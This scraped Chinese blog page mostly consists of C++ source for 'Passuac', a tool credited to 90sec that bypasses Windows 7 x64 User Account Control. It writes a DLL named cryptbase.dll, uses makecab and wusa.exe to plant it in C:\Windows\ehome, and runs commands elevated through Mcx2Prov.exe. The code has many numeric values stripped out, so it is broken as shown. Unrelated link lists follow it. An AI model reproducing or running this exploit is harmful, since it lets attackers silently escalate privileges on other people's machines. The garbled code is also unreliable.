// Passuac.cpp : Defines the entry point for the console application.

//

#include "stdafx.h"

#include <Windows.h>

#include <stdio.h>

#include  <direct.h>

BOOL IsUserInAdminGroup() //判断是否在管理员组

{

    BOOL fInAdminGroup = FALSE;

    HANDLE hToken = NULL;

    HANDLE hTokenToCheck = NULL;

    DWORD cbSize = ;

    OSVERSIONINFO osver = {};

    osver.dwOSVersionInfoSize = sizeof(osver);

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_DUPLICATE, &hToken))

        goto Cleanup;

    if (!GetVersionEx(&osver))

        goto Cleanup;

    if (osver.dwMajorVersion >= )

    {

        TOKEN_ELEVATION_TYPE elevType;

        if (!GetTokenInformation(hToken, TokenElevationType, &elevType, sizeof(elevType), &cbSize))

            goto Cleanup;

        if (TokenElevationTypeLimited == elevType)

        {

            if (!GetTokenInformation(hToken, TokenLinkedToken, &hTokenToCheck, sizeof(hTokenToCheck), &cbSize))

                goto Cleanup;

        }

    }

    if (!hTokenToCheck)

    {

        if (!DuplicateToken(hToken, SecurityIdentification, &hTokenToCheck))

            goto Cleanup;

    }

    BYTE adminSID[SECURITY_MAX_SID_SIZE];

    cbSize = sizeof(adminSID);

    if (!CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, &adminSID, &cbSize))

        goto Cleanup;

    if (!CheckTokenMembership(hTokenToCheck, &adminSID, &fInAdminGroup))

        goto Cleanup;

Cleanup:

    if (hToken)    CloseHandle(hToken);

    if (hTokenToCheck) CloseHandle(hTokenToCheck);

    return fInAdminGroup;

}

BOOL IsRunAsAdmin() //判断是否以管理员权限运行

{

    BOOL fIsRunAsAdmin = FALSE;

    DWORD dwError = ERROR_SUCCESS;

    PSID pAdministratorsGroup = NULL;

    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;

    if (!AllocateAndInitializeSid(

        &NtAuthority,

        ,

        SECURITY_BUILTIN_DOMAIN_RID,

        DOMAIN_ALIAS_RID_ADMINS,

        , , , , , ,

        &pAdministratorsGroup))

    {

        dwError = GetLastError();

        goto Cleanup;

    }

    if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin))

    {

        dwError = GetLastError();

        goto Cleanup;

    }

Cleanup:

    if (pAdministratorsGroup) FreeSid(pAdministratorsGroup);

    return fIsRunAsAdmin;

}

BOOL writedll64()

{

    char Szpath[MAX_PATH] = {};

    char uacexqute[] = {};

    DWORD   dwWrite=;

    WORD wResID;

    HANDLE  hFile = CreateFileA("cryptbase.dll",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);

    if (hFile == INVALID_HANDLE_VALUE)

    {

        printf("Getlasterror:%d.\r\n",GetLastError());

        return ;

    }

    HRSRC hrsc = FindResource(NULL,MAKEINTRESOURCE(IDR_TESTDLL1),L"TESTDLL");

    HGLOBAL hG = LoadResource(NULL, hrsc);

    DWORD   dwSize = SizeofResource( NULL,  hrsc); 

    WriteFile(hFile,hG,dwSize,&dwWrite,NULL);

    CloseHandle( hFile );

    getcwd(Szpath, MAX_PATH);

    strcat(Szpath,"\\cryptbase.tmp");

    system("makecab cryptbase.dll cryptbase.tmp");

    sprintf(uacexqute,"%s /extract:C:\\Windows\\ehome\\",Szpath);

    ShellExecuteA(NULL, "open", "wusa.exe", uacexqute, NULL, SW_HIDE);

    //remove("cryptbase*");

    DeleteFileA("cryptbase.dll");

    DeleteFileA("cryptbase.tmp");

    return true;

}

int main(int argc,char* argv[])

{

    FILE* fp;

    char szcmd[] = {};

    char *Options;

    char buffer[] = {};

    STARTUPINFO si={sizeof(si)};

    PROCESS_INFORMATION pi;

    si.dwFlags=STARTF_USESHOWWINDOW;

    si.wShowWindow=TRUE;

    if (argc < )

    {

        printf("[*]:%s Passuac for windows 7 x64\n",argv[]);

        printf("[*]:%s Setp1: passuac\r\n",argv[]);

        printf("[*]:%s Setp2: shell_cmd\r\n",argv[]);

        printf("[*]:Welcome to www.90sec.org\r\n");

        printf("[*]:Pass uac t00ls By:@90sec\r\n\r\n");

        return ;

    }

    strcpy(szcmd,argv[]);

    char szNewCmd[MAX_PATH] = {};

    wsprintfA(szNewCmd, "\"%s\"", szcmd);

    if (!IsUserInAdminGroup())

    {

        printf("Your not have in Local Administrator Group\r\n");

        printf("Program exit;");

        exit();

    }else

    {

        printf("Your have in Local Administrator Group\r\n");

        printf("PassUac ing.....\r\n");

        if (!IsRunAsAdmin())

        {

            if (!strcmp(szcmd,"passuac"))

            {

                writedll64();

            }else

            {

                ShellExecuteA(NULL, "open", "C:\\windows\\ehome\\Mcx2Prov.exe", szNewCmd, NULL, SW_HIDE);

                Sleep();

                fp = fopen("c:\\programdata\\uac.txt","rb");

                if (fp == NULL)

                {

                    printf("Getlasterror:%d\r\n",GetLastError());

                    return ;

                }

                ZeroMemory(buffer,sizeof(buffer));

                while (fgets(buffer,sizeof(buffer),fp))

                {

                    printf(buffer);

                }

                fclose(fp);

            }

        }

    }

    return ;

}

需要自己写个DLL,来进行参数解析。请看代码把。

代码写的相当烂,但是能够达到地步,还请各位莫笑话。

WIN7 X64 PASSUAC 源码的更多相关文章

  1. tesseract4.0:win10 +x64+vs2015 源码安装(ViewerDebugging)安装记录

    参考文章: https://blog.csdn.net/u013985291/article/details/78295789 https://blog.csdn.net/u013985291/art ...

  2. 16Aspx.com源码2014年7月详细

            Web电子商务网(三层)V2.0源码 2014-07-31   [VS2010] 源码介绍: Web电子商务网(三层)V2.0源码 源码描述: 一.源码特点     采用三层架构开发, ...

  3. win7 x64 +vs2015 + cmake3.10.3编译opencv-3.4.1+opencv_contrib-3.4.1源码,并进行配置

    简介: 一直以来都是在ubuntu下使用opencv,最近因为有<图像处理与模式识别>这门课,需要使用vs2015+opencv提交课程作业,因为opencv官方编译好的exe没有cont ...

  4. qt4.8.7 源码在win7+vs2010环境的x64编译(qt 64位)

    由于qt官网上,没有直接提供x64的安装包,但由于项目需要x64的qt,所以,小编不得不下载qt的源码,经历了一次长达约4个小时的编译过程.今年国庆7天,就遭这事上了,哈哈~~~ 几个下载链接: qt ...

  5. 谷歌开源项目Chromium的源码获取与项目构建(Win7+vs10/vs13)

    转自:http://blog.csdn.net/kuerjinjin/article/details/23563059 从12年那会儿开始获取源码和构建chromium项目都是按照那时候的官方要求用w ...

  6. mpusher 源码编译 for windows X64

    mpusher 源码编译 for windows X64 对于java我是小白,通过一步步的摸索,将经验总结下来,给更多码友提供入门的帮助.一个人的摸索是很困难的,本教程感谢 [MPush开源消息推送 ...

  7. Windows 10 x64 下编译 Hadoop 源码

    Windows 10 x64 下编译 Hadoop 源码 环境准备 Hadoop并没有提供官方的 Windows 10 下的安装包,所以需要自己手动来编译,官方文档中 BUILDING.txt 文件中 ...

  8. QGIS(2.18.15 源码)+Qt(5/5.9.3)+VS2015(X64)编译

    由于工作要求,今年需要基于Qt搞跨平台的GIS.前期未曾接触过Qt,最近也简单学习了下,开源的QGIS是非常不错的学习资源,下了最新版的QGIS源码,不过在VS2015下却没法直接打开.网上查了很多资 ...

  9. 32位win7+vs2008编译mysql 5.6.22源码并安装

    以下这部分安装说明是来自http://www.2cto.com/database/201407/316681.html的win7+vs2010源码编译mysql,文章最后会说明用vs2008编译遇见的 ...

随机推荐

  1. &#x编码转换成汉字

    import java.io.UnsupportedEncodingException; public class UnicodeDecoder { public static String esca ...

  2. java读取本地文件

    File file = new File("F:/hejing/InstrumentJsonData.txt");        StringBuilder localStrBul ...

  3. java集合的部分接口

    接口 Collection<E> public interface Collection<E>extends Iterable<E> Collection 层次结构 ...

  4. vertical-align:middle;一般用于img和行内文字对齐方式

    vertical-align:top ;文字和行内块元素的顶部对齐 vertical-align:middle;居中 vertical-align:bottom;底对齐

  5. ThinkPHP的create方法的一系列操作

    1.数据操作状态 create方法的第二个参数可以指定数据的操作状态,默认是自动判断的(写入[Model:MODEL_INSERT或者1].更新[Model:MODEL_UPDATE或者2].也可以自 ...

  6. JDBC请求

    做JDBC请求,首先需要两个jar包:mysql驱动-mysql-connector-java-5.1.13-bin.jar 和 sqlServer驱动-sqljdbc4.jar,将这两个jar包放到 ...

  7. 曾经遇到的坑------href="#"和href="javascript:void(0);"、href="javascript:;"

    这个是为了 在点击此链接后回到页首,如果你写href="#"那么点击后会回到页首,这样影响操作. <a href="javascript:void 0" ...

  8. Python基础(17)_面向对象程序设计(抽象类、继承原理、封装、多态,绑定方法)

    一.抽象类 抽象类是一个特殊的类,它的特殊之处在于只能被继承,不能被实例化 1.在python中实现抽象类 import abc #利用abc模块实现抽象类 class All_file(metacl ...

  9. Andorid:日常学习笔记(3)——掌握日志工具的使用

    Andorid:日常学习笔记(3)——掌握日志工具的使用 使用Android的日志工具Log 方法: Android中的日志工具类为Log,这个类提供了如下方法来供我们打印日志: 使用方法: Log. ...

  10. ionic资源网站

    http://ionichina.com/topic/570b1f4ecd63e4247a7cfcf3 http://doc.ionicmaterialdesign.com/#intro http:/ ...